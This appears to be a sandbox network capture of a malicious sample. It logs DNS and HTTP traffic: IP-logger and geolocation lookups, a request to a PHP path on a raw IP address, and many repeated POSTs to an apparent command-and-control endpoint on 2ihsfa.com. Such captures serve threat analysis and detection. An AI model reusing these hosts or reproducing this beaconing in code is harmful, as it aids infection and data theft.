19218611734bcgoogleusercontentcom
DNS

music-sec.xyz

Remote address:

8.8.8.8:53

Request

music-sec.xyz

IN A

Response
DNS

iplogger.org

Remote address:

8.8.8.8:53

Request

iplogger.org

IN A

Response

iplogger.org

IN A

172.67.132.113

iplogger.org

IN A

104.21.4.208
GET

http://ip-api.com/json/

Remote address:

208.95.112.1:80

Request

GET /json/ HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Host: ip-api.com

Response

HTTP/1.1 200 OK

Date: Sat, 30 Dec 2023 17:50:48 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 313
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
DNS

113.132.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

113.132.67.172.in-addr.arpa

IN PTR

Response
DNS

113.132.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

113.132.67.172.in-addr.arpa

IN PTR
DNS

225.243.59.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

225.243.59.199.in-addr.arpa

IN PTR

Response
DNS

225.243.59.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

225.243.59.199.in-addr.arpa

IN PTR
GET

http://186.2.171.3/seemorebty/il.php?e=md9_1sjm

Remote address:

186.2.171.3:80

Request

GET /seemorebty/il.php?e=md9_1sjm HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3
Accept-Language: en-US,en;q=0.9
Referer: https://www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36
Host: 186.2.171.3

Response

HTTP/1.1 301 Moved Permanently

Server: ddos-guard
Date: Sat, 30 Dec 2023 17:50:48 GMT
Connection: keep-alive
Keep-Alive: timeout=60
Location: https://186.2.171.3/seemorebty/il.php?e=md9_1sjm
Content-Type: text/html; charset=utf8
Content-Length: 568
DNS

iplogger.org

Remote address:

8.8.8.8:53

Request

iplogger.org

IN A

Response

iplogger.org

IN A

172.67.132.113

iplogger.org

IN A

104.21.4.208
DNS

3.171.2.186.in-addr.arpa

Remote address:

8.8.8.8:53

Request

3.171.2.186.in-addr.arpa

IN PTR

Response

3.171.2.186.in-addr.arpa

IN PTR

12by12ltd
DNS

3.171.2.186.in-addr.arpa

Remote address:

8.8.8.8:53

Request

3.171.2.186.in-addr.arpa

IN PTR
DNS

1.112.95.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.112.95.208.in-addr.arpa

IN PTR

Response

1.112.95.208.in-addr.arpa

IN PTR

ip-apicom
DNS

1.112.95.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.112.95.208.in-addr.arpa

IN PTR
DNS

201.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

201.178.17.96.in-addr.arpa

IN PTR

Response

201.178.17.96.in-addr.arpa

IN PTR

a96-17-178-201deploystaticakamaitechnologiescom
DNS

201.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

201.178.17.96.in-addr.arpa

IN PTR
DNS

201.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

201.178.17.96.in-addr.arpa

IN PTR
DNS

9.228.82.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

9.228.82.20.in-addr.arpa

IN PTR

Response
DNS

x2.i.lencr.org

Remote address:

8.8.8.8:53

Request

x2.i.lencr.org

IN A

Response

x2.i.lencr.org

IN CNAME

crl.root-x1.letsencrypt.org.edgekey.net

crl.root-x1.letsencrypt.org.edgekey.net

IN CNAME

e8652.dscx.akamaiedge.net

e8652.dscx.akamaiedge.net

IN A

173.222.13.40
DNS

x2.i.lencr.org

Remote address:

8.8.8.8:53

Request

x2.i.lencr.org

IN A
DNS

www.facebook.com

Remote address:

8.8.8.8:53

Request

www.facebook.com

IN A

Response

www.facebook.com

IN CNAME

star-mini.c10r.facebook.com

star-mini.c10r.facebook.com

IN A

163.70.147.35
DNS

www.facebook.com

Remote address:

8.8.8.8:53

Request

www.facebook.com

IN A
GET

http://x2.i.lencr.org/

Remote address:

173.222.13.40:80

Request

GET / HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: x2.i.lencr.org

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: application/pkix-cert
Last-Modified: Fri, 04 Aug 2023 20:57:55 GMT
ETag: "64cd6653-464"
Content-Disposition: attachment; filename="ISRG Root X2 signed by ISRG Root X1.der"
Cache-Control: max-age=3600
Expires: Sat, 30 Dec 2023 18:50:50 GMT
Date: Sat, 30 Dec 2023 17:50:50 GMT
Content-Length: 1124
Connection: keep-alive
DNS

x2.c.lencr.org

Remote address:

8.8.8.8:53

Request

x2.c.lencr.org

IN A

Response

x2.c.lencr.org

IN CNAME

crl.root-x1.letsencrypt.org.edgekey.net

crl.root-x1.letsencrypt.org.edgekey.net

IN CNAME

e8652.dscx.akamaiedge.net

e8652.dscx.akamaiedge.net

IN A

173.222.13.40
DNS

40.13.222.173.in-addr.arpa

Remote address:

8.8.8.8:53

Request

40.13.222.173.in-addr.arpa

IN PTR

Response

40.13.222.173.in-addr.arpa

IN PTR

a173-222-13-40deploystaticakamaitechnologiescom
GET

http://x2.c.lencr.org/

Remote address:

173.222.13.40:80

Request

GET / HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: x2.c.lencr.org

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: application/pkix-crl
Last-Modified: Fri, 04 Aug 2023 20:57:56 GMT
ETag: "64cd6654-12c"
Cache-Control: max-age=3600
Expires: Sat, 30 Dec 2023 18:50:52 GMT
Date: Sat, 30 Dec 2023 17:50:52 GMT
Content-Length: 300
Connection: keep-alive
DNS

e1.o.lencr.org

Remote address:

8.8.8.8:53

Request

e1.o.lencr.org

IN A

Response

e1.o.lencr.org

IN CNAME

o.lencr.edgesuite.net

o.lencr.edgesuite.net

IN CNAME

a1887.dscq.akamai.net

a1887.dscq.akamai.net

IN A

96.17.179.201

a1887.dscq.akamai.net

IN A

96.17.179.193
GET

http://e1.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBTvkAFw3ViPKmUeIVEf3NC7b1ErqwQUWvPtK%2Fw2wjd5uVIw6lRvz1XLLqwCEgTb71q4OVLvrOAjsfa2O%2Fec4w%3D%3D

Remote address:

96.17.179.201:80

Request

GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBTvkAFw3ViPKmUeIVEf3NC7b1ErqwQUWvPtK%2Fw2wjd5uVIw6lRvz1XLLqwCEgTb71q4OVLvrOAjsfa2O%2Fec4w%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: e1.o.lencr.org

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: application/ocsp-response
Content-Length: 344
ETag: "5D4309E645E1EFB3642887E5D6D83EAE0DE237FA328BF057983BA457E59206E0"
Last-Modified: Sat, 30 Dec 2023 05:10:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=16451
Expires: Sat, 30 Dec 2023 22:25:04 GMT
Date: Sat, 30 Dec 2023 17:50:53 GMT
Connection: keep-alive
DNS

35.147.70.163.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.147.70.163.in-addr.arpa

IN PTR

Response

35.147.70.163.in-addr.arpa

IN PTR

edge-star-mini-shv-01-lhr6facebookcom
DNS

201.179.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

201.179.17.96.in-addr.arpa

IN PTR

Response

201.179.17.96.in-addr.arpa

IN PTR

a96-17-179-201deploystaticakamaitechnologiescom
DNS

50.23.12.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

50.23.12.20.in-addr.arpa

IN PTR

Response
DNS

43.58.199.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.58.199.20.in-addr.arpa

IN PTR

Response
DNS

43.58.199.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.58.199.20.in-addr.arpa

IN PTR
DNS

humisnee.com

Remote address:

8.8.8.8:53

Request

humisnee.com

IN A

Response

humisnee.com

IN A

185.107.56.199
DNS

survey-smiles.com

Remote address:

8.8.8.8:53

Request

survey-smiles.com

IN A

Response

survey-smiles.com

IN A

199.59.243.225
GET

http://survey-smiles.com/

Remote address:

199.59.243.225:80

Request

GET / HTTP/1.1
Host: survey-smiles.com
User-Agent: Go-http-client/1.1
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

date: Sat, 30 Dec 2023 17:50:57 GMT
content-type: text/html; charset=utf-8
content-length: 1021
x-request-id: 85fc9a3a-adb6-476a-8080-f978e07b795b
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_GSbXHjSyM4GBXh+TDdQi5Ch6arC3xeKj8KkRwOq4qrqrlRcvBA0AmkBJ57Iam4tUGtRHYm5e3uPQsAB9Z6SRbg==
set-cookie: parking_session=85fc9a3a-adb6-476a-8080-f978e07b795b; expires=Sat, 30 Dec 2023 18:05:58 GMT; path=/
DNS

199.56.107.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

199.56.107.185.in-addr.arpa

IN PTR

Response
DNS

167.109.18.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

167.109.18.2.in-addr.arpa

IN PTR

Response

167.109.18.2.in-addr.arpa

IN PTR

a2-18-109-167deploystaticakamaitechnologiescom
DNS

uehge4g6gh.2ihsfa.com

Remote address:

8.8.8.8:53

Request

uehge4g6gh.2ihsfa.com

IN A

Response

uehge4g6gh.2ihsfa.com

IN A

13.248.169.48

uehge4g6gh.2ihsfa.com

IN A

76.223.54.146
GET

http://uehge4g6gh.2ihsfa.com/api/fbtime

Remote address:

13.248.169.48:80

Request

GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 200 OK

Server: openresty
Date: Sat, 30 Dec 2023 17:51:03 GMT
Content-Type: text/html
Content-Length: 12976
Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT
Connection: keep-alive
ETag: "657a13bf-32b0"
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_KaWOJxVo1Wxbcc+AjlokCvPHAVfk+7HAYX4W8r0yTBJuGZf5J86jQ7CZXWc9nzXAYq697W9ZN7boIHgI7mUlIQ
Cache-Control: no-cache
X-Content-Type-Options: nosniff
Set-Cookie: caf_ipaddr=89.149.23.59;Path=/;Max-Age=86400;
Set-Cookie: country=RO;Path=/;Max-Age=86400;
Set-Cookie: city="";Path=/;Max-Age=86400;
Set-Cookie: expiry_partner=;Path=/;Max-Age=86400;
Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400;
Accept-Ranges: bytes
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 405 Not Allowed

Server: openresty
Date: Sat, 30 Dec 2023 17:51:05 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 405 Not Allowed

Server: openresty
Date: Sat, 30 Dec 2023 17:51:05 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 405 Not Allowed

Server: openresty
Date: Sat, 30 Dec 2023 17:51:05 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 405 Not Allowed

Server: openresty
Date: Sat, 30 Dec 2023 17:51:06 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 405 Not Allowed

Server: openresty
Date: Sat, 30 Dec 2023 17:51:06 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 405 Not Allowed

Server: openresty
Date: Sat, 30 Dec 2023 17:51:06 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 405 Not Allowed

Server: openresty
Date: Sat, 30 Dec 2023 17:51:06 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 405 Not Allowed

Server: openresty
Date: Sat, 30 Dec 2023 17:51:06 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 405 Not Allowed

Server: openresty
Date: Sat, 30 Dec 2023 17:51:07 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 405 Not Allowed

Server: openresty
Date: Sat, 30 Dec 2023 17:51:07 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 405 Not Allowed

Server: openresty
Date: Sat, 30 Dec 2023 17:51:07 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 405 Not Allowed

Server: openresty
Date: Sat, 30 Dec 2023 17:51:08 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 405 Not Allowed

Server: openresty
Date: Sat, 30 Dec 2023 17:51:08 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 405 Not Allowed

Server: openresty
Date: Sat, 30 Dec 2023 17:51:08 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com

Response

HTTP/1.1 405 Not Allowed

Server: openresty
Date: Sat, 30 Dec 2023 17:51:08 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
